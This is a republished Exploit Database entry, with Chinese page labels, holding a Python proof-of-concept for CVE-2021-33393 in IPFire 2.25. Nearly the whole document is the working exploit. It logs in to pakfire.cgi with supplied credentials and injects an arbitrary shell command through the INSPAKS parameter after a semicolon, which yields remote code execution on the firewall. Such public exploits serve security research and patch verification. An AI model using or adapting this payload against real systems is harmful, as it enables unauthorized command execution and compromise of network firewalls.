IPFire 2.25 – Remote Code Execution (Authenticated)

• Exploit Database
• 23 阅读

• 作者： Mücahit Saratar
  日期： 2021-05-17
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/49869/

• # Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated)
  # Date: 15/05/2021
  # Exploit Author: Mücahit Saratar
  # Vendor Homepage: https://www.ipfire.org/
  # Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso
  # Version: 2.25 - core update 156
  # Tested on: parrot os 5.7.0-2parrot2-amd64
  # CVE: CVE-2021-33393
  
  #!/usr/bin/python3
  
  import requests as R
  import sys
  import base64
  
  try:
  host = sys.argv[1]
  assert host[:4] == "http" and host[-1] != "/"
  url = host + "/cgi-bin/pakfire.cgi"
  username = sys.argv[2]
  password = sys.argv[3]
  komut = sys.argv[4]
  except:
  print(f"{sys.argv[0]} http://target.com:444 username password command")
  exit(1)
  
  veri = { 
  "INSPAKS": f"7zip;{komut}",
  "ACTION":"install",
  "x": "10",
  "y": "6" }
  token = b"Basic " + base64.b64encode(f"{username}:{password}".encode())
  header = {"Authorization": token,
  "Connection": "close",
  "Cache-Control": "max-age=0",
  "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
  "Origin": host,
  "Sec-GPC": "1",
  "Sec-Fetch-Site": "same-origin",
  "Sec-Fetch-Mode": "navigate",
  "Sec-Fetch-User": "?1",
  "Sec-Fetch-Dest": "document",
  "Referer": host}
  
  
  R.post(url, data=veri, headers=header, verify=False)
  print("Done.")